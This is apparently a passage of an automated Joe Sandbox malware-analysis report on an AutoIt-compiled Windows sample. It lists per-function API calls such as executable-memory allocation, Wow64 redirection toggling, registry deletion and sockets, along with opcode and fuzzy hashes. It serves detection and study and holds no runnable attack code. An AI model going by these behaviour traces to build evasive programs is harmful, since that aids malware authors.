                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$MoveWindow
                                                              • String ID: Listbox
                                                              • API String ID: 3315199576-2633736733
                                                              • Opcode ID: 07e4dc875ff0c2e1442eb7fe0b2d7b06fe48a9fd8faded7ffca5b7688b0f9e03
                                                              • Instruction ID: 7a05d17c9a144e4301427d5d65faa1e207a8e64369c2aac39169d35d84af8b6c
                                                              • Opcode Fuzzy Hash: 07e4dc875ff0c2e1442eb7fe0b2d7b06fe48a9fd8faded7ffca5b7688b0f9e03
                                                              • Instruction Fuzzy Hash: 5521B332600118BFDF118F54CC45FFB3BBAEF89754F028129F9455B2A0C6799C5197A4
                                                              APIs
                                                              • __snwprintf.LIBCMT ref: 004A3A66
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __snwprintf_memmove
                                                              • String ID: , $$AUTOITCALLVARIABLE%d$%L
                                                              • API String ID: 3506404897-2952655123
                                                              • Opcode ID: 0aeeaf6444dfc5cdf7bb621e09da94bd422f85f0cc79ba743cc4c62a1177bed3
                                                              • Instruction ID: 81d4d209a21bb3768b80cdfff0c54c03e09ac0e2ca255a42007bc923672af35b
                                                              • Opcode Fuzzy Hash: 0aeeaf6444dfc5cdf7bb621e09da94bd422f85f0cc79ba743cc4c62a1177bed3
                                                              • Instruction Fuzzy Hash: 1621D771600218AFCF10EF55CC82EAEB7B4AF59305F50045FF449A7182EB38EA45CB69
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 004B7772
                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 004B7787
                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 004B7794
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: msctls_trackbar32
                                                              • API String ID: 3850602802-1010561917
                                                              • Opcode ID: d95081a6d7b482862e9a47de923438df400c95e2d48fea4248f28c7f382e6306
                                                              • Instruction ID: 4d002ee341036f4516498d048434b8dfb708241e377bf6e21e54254f52cb28f0
                                                              • Opcode Fuzzy Hash: d95081a6d7b482862e9a47de923438df400c95e2d48fea4248f28c7f382e6306
                                                              • Instruction Fuzzy Hash: 0D112732200208BFEF205F61CC01FEB77A8EFC8B54F11052AFA4192190C675E811CB24
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __calloc_crt
                                                              • String ID: N$@BO
                                                              • API String ID: 3494438863-3527719973
                                                              • Opcode ID: dcb799494872f50fa8a5612cf66b0a1ae91f4076f6f735b4d3a21d77c7fa4f28
                                                              • Instruction ID: 30456713e9f58cedc83cb407f947787b8cf90f2b2998e9bc8037ac3aee294be5
                                                              • Opcode Fuzzy Hash: dcb799494872f50fa8a5612cf66b0a1ae91f4076f6f735b4d3a21d77c7fa4f28
                                                              • Instruction Fuzzy Hash: 6CF0CD71204A225BF7648F16BC51B733794E704335B92016FEA04DF187EB389845CACC
                                                              APIs
                                                              • __lock.LIBCMT ref: 00459B94
                                                                • Part of subcall function 00459C0B: __mtinitlocknum.LIBCMT ref: 00459C1D
                                                                • Part of subcall function 00459C0B: EnterCriticalSection.KERNEL32(00000000,?,00459A7C,0000000D), ref: 00459C36
                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00459BA4
                                                                • Part of subcall function 00459100: ___addlocaleref.LIBCMT ref: 0045911C
                                                                • Part of subcall function 00459100: ___removelocaleref.LIBCMT ref: 00459127
                                                                • Part of subcall function 00459100: ___freetlocinfo.LIBCMT ref: 0045913B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                              • String ID: 8N$8N
                                                              • API String ID: 547918592-2090888977
                                                              • Opcode ID: b4b4c0219642781cebe0d1c177be5dfc987db7148f23142ad3a7d1283a012362
                                                              • Instruction ID: 400b8ae72845e6b40a1cf3a95068927f3f4dbad9022b707306787b2a0e685e7c
                                                              • Opcode Fuzzy Hash: b4b4c0219642781cebe0d1c177be5dfc987db7148f23142ad3a7d1283a012362
                                                              • Instruction Fuzzy Hash: ABE08671543351EEEA10F7A7A94372D76506B00727F20015FF855690C3DEFC2908851F
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00434BD0,?,00434DEF,?,004F52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00434C11
                                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00434C23
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-3689287502
                                                              • Opcode ID: 6a5e8ac1967581cefa35dad01d767a06f40bda90f1aa0659b2094a184e98d471
                                                              • Instruction ID: 0ac4f03420925c1dac39e4d5aab1b6e5e6b11c277e9009490f686bcd3c1b6f45
                                                              • Opcode Fuzzy Hash: 6a5e8ac1967581cefa35dad01d767a06f40bda90f1aa0659b2094a184e98d471
                                                              • Instruction Fuzzy Hash: 9CD08C30510712CFCB205B75DC08247B6E5AF08342B119C3A9489C2650E6B8E8808618
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00434B83,?), ref: 00434C44
                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00434C56
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                              • API String ID: 2574300362-1355242751
                                                              • Opcode ID: c72dbb7b357fc79cfabcdc662476c91260f4ce7f67aaa5c06ab88f088c6a0b64
                                                              • Instruction ID: ff736fbbfc9e0f9ce16649831654e7fde91ea51e4d16e048d657f5d335459bc0
                                                              • Opcode Fuzzy Hash: c72dbb7b357fc79cfabcdc662476c91260f4ce7f67aaa5c06ab88f088c6a0b64
                                                              • Instruction Fuzzy Hash: 48D0C230510713CFC7204F36CC0824672D4AF04341F21DC3BD49AC6264E678E880CA18
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,004B1039), ref: 004B0DF5
                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004B0E07
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                              • API String ID: 2574300362-4033151799
                                                              • Opcode ID: 3f08a6163326457d7195897a896fd6371346c246eff9f70a8d7465fa83b254e7
                                                              • Instruction ID: 7b05e3af93d8642ffbb834e61b36acaf385eba6a70ebae9d3019088a3a7431c3
                                                              • Opcode Fuzzy Hash: 3f08a6163326457d7195897a896fd6371346c246eff9f70a8d7465fa83b254e7
                                                              • Instruction Fuzzy Hash: A9D0EC71510712DFD7205B79C80968776D5AF14352F118D3E9495D2690E6B8E8A08658
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,004A8CF4,?,004BF910), ref: 004A90EE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004A9100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: 01bc308dea32346226bd5dd66a0382cdcba64908a0569a46468fe70c561e0fb5
                                                              • Instruction ID: faf8af35db1ce046db43d281dc2e505e7e37994fc1fe7cd97d2bb1bd206e368f
                                                              • Opcode Fuzzy Hash: 01bc308dea32346226bd5dd66a0382cdcba64908a0569a46468fe70c561e0fb5
                                                              • Instruction Fuzzy Hash: 93D0EC34510723DFEB209B35DC1864676D4AF15351B118D3AD499D6690E678DC848654
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: 01325be9e4c6051e35a4448efc3e6cc06b7580211db6628caa1201aa3ad72352
                                                              • Instruction ID: 1d1f92d7850e3c3dd8e182353387dc0caddab29a077c05ed2daa4556f180122f
                                                              • Opcode Fuzzy Hash: 01325be9e4c6051e35a4448efc3e6cc06b7580211db6628caa1201aa3ad72352
                                                              • Instruction Fuzzy Hash: B1D05B71804118FBC7189B959C89CFD737CA718302F104563F80AE2060E23D9B56D76F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a65d427c20d39d62de57b59e79ea3fbaba15adc0930c4c353b9c890cfb359279
                                                              • Instruction ID: ee2b8da15ca11c6c739890c66bc4d8178e52eac77f165498d78cee1b0589de84
                                                              • Opcode Fuzzy Hash: a65d427c20d39d62de57b59e79ea3fbaba15adc0930c4c353b9c890cfb359279
                                                              • Instruction Fuzzy Hash: 1CC1B074A04216EFCB14DFA4C894EAEBBB5FF48704B208999E809DB351D734ED81DB94
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 004AE0BE
                                                              • CharLowerBuffW.USER32(?,?), ref: 004AE101
                                                                • Part of subcall function 004AD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 004AD7C5
                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 004AE301
                                                              • _memmove.LIBCMT ref: 004AE314
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                              • String ID:
                                                              • API String ID: 3659485706-0
                                                              • Opcode ID: 82225728b38104ff9a49db83fe23b21830db10bc2d2ab117fc3e1b77855114c7
                                                              • Instruction ID: 7bfe68dc16036f5598c4543002d435e84518da6fe6d3a770a91897647d100ceb
                                                              • Opcode Fuzzy Hash: 82225728b38104ff9a49db83fe23b21830db10bc2d2ab117fc3e1b77855114c7
                                                              • Instruction Fuzzy Hash: B1C168716083019FC714DF29C480A6ABBE4FF9A318F14896EF8999B351D735E906CB86
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 004A80C3
                                                              • CoUninitialize.OLE32 ref: 004A80CE
                                                                • Part of subcall function 0048D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0048D5D4
                                                              • VariantInit.OLEAUT32(?), ref: 004A80D9
                                                              • VariantClear.OLEAUT32(?), ref: 004A83AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: d9d845acb7bb8352719a493293ea408f1a897c95de110c31809698f406013b6a
                                                              • Instruction ID: af64c381ab31acfe6a70703340d28455f8d13ab560cdff11b59fe90c2b880563
                                                              • Opcode Fuzzy Hash: d9d845acb7bb8352719a493293ea408f1a897c95de110c31809698f406013b6a
                                                              • Instruction Fuzzy Hash: 7EA135756047019FCB04EF15C881A2AB7E4FF9A358F04445EF9999B3A1CB78EC05CB8A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 078a7bcf3c078cbf3f66e5fd65bbfb7992060a6bc44122d3510f3b43b44665df
                                                              • Instruction ID: e07d27d010c06c55b65112b7424c3798da38cbb11ba45ddd3400a51f7896e079
                                                              • Opcode Fuzzy Hash: 078a7bcf3c078cbf3f66e5fd65bbfb7992060a6bc44122d3510f3b43b44665df
                                                              • Instruction Fuzzy Hash: 1C51F7747003019ACBA8BF66D891A3EB3E5AF45314F21DC1FE586DB291DB78D885870D
                                                              APIs
                                                              • GetWindowRect.USER32(0122EC48,?), ref: 004B9863
                                                              • ScreenToClient.USER32(00000002,00000002), ref: 004B9896
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 004B9903
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: 31da4bdc92ac023c65ad5f9bc9b43339f75802d1ae0b4997b61e607e802dd459
                                                              • Instruction ID: fb97e32b4fc6a61b2e5be8e88d5a3be1efcfd92e1f0390b3e5d7481e6896d6b0
                                                              • Opcode Fuzzy Hash: 31da4bdc92ac023c65ad5f9bc9b43339f75802d1ae0b4997b61e607e802dd459
                                                              • Instruction Fuzzy Hash: 1B514D74A00608AFCB14DF64D880AEE7BB5FF45360F10826AFA559B3A0D734AD51CBA4
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00489AD2
                                                              • __itow.LIBCMT ref: 00489B03
                                                                • Part of subcall function 00489D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00489DBE
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00489B6C
                                                              • __itow.LIBCMT ref: 00489BC3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: b0ba78b4311b23f210d2f4f80b22dd7a5157a520417991c1e763581047cd0376
                                                              • Instruction ID: ea05e8f9c470d455b1e09682da42dcaa079daa3867837a899d848bcdd8bfea9d
                                                              • Opcode Fuzzy Hash: b0ba78b4311b23f210d2f4f80b22dd7a5157a520417991c1e763581047cd0376
                                                              • Instruction Fuzzy Hash: 4841D5B0A00608ABDF21EF55C845BFE7BB9EF48724F04042EF905A3291DB78AD44CB59
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 004A69D1
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A69E1
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 004A6A45
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 004A6A51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                              • String ID:
                                                              • API String ID: 2214342067-0
                                                              • Opcode ID: b5de05217b6337f7d1f4f3bfe01da78d02f33d63695350284382cdfd3830bb65
                                                              • Instruction ID: dd9f4a190b6f4f9e5aa65011d06a0a31312308adfd242bc16a5d5cc7be01d057
                                                              • Opcode Fuzzy Hash: b5de05217b6337f7d1f4f3bfe01da78d02f33d63695350284382cdfd3830bb65
                                                              • Instruction Fuzzy Hash: 1841C3747002006FEB50BF25DC86F2E77A49B59B18F14C56EFA199B3C2DAB89D008B59
                                                              APIs
                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,004BF910), ref: 004A64A7
                                                              • _strlen.LIBCMT ref: 004A64D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID:
                                                              • API String ID: 4218353326-0
                                                              • Opcode ID: 0c72af583b88bb71b1add66067b0cce0f4fe6c05b197565f2b960e2ce0536e8c
                                                              • Instruction ID: 991a0e93809402c3f49d5bf5e64f740e0246e6f9c61296e897c0a34710219b1b
                                                              • Opcode Fuzzy Hash: 0c72af583b88bb71b1add66067b0cce0f4fe6c05b197565f2b960e2ce0536e8c
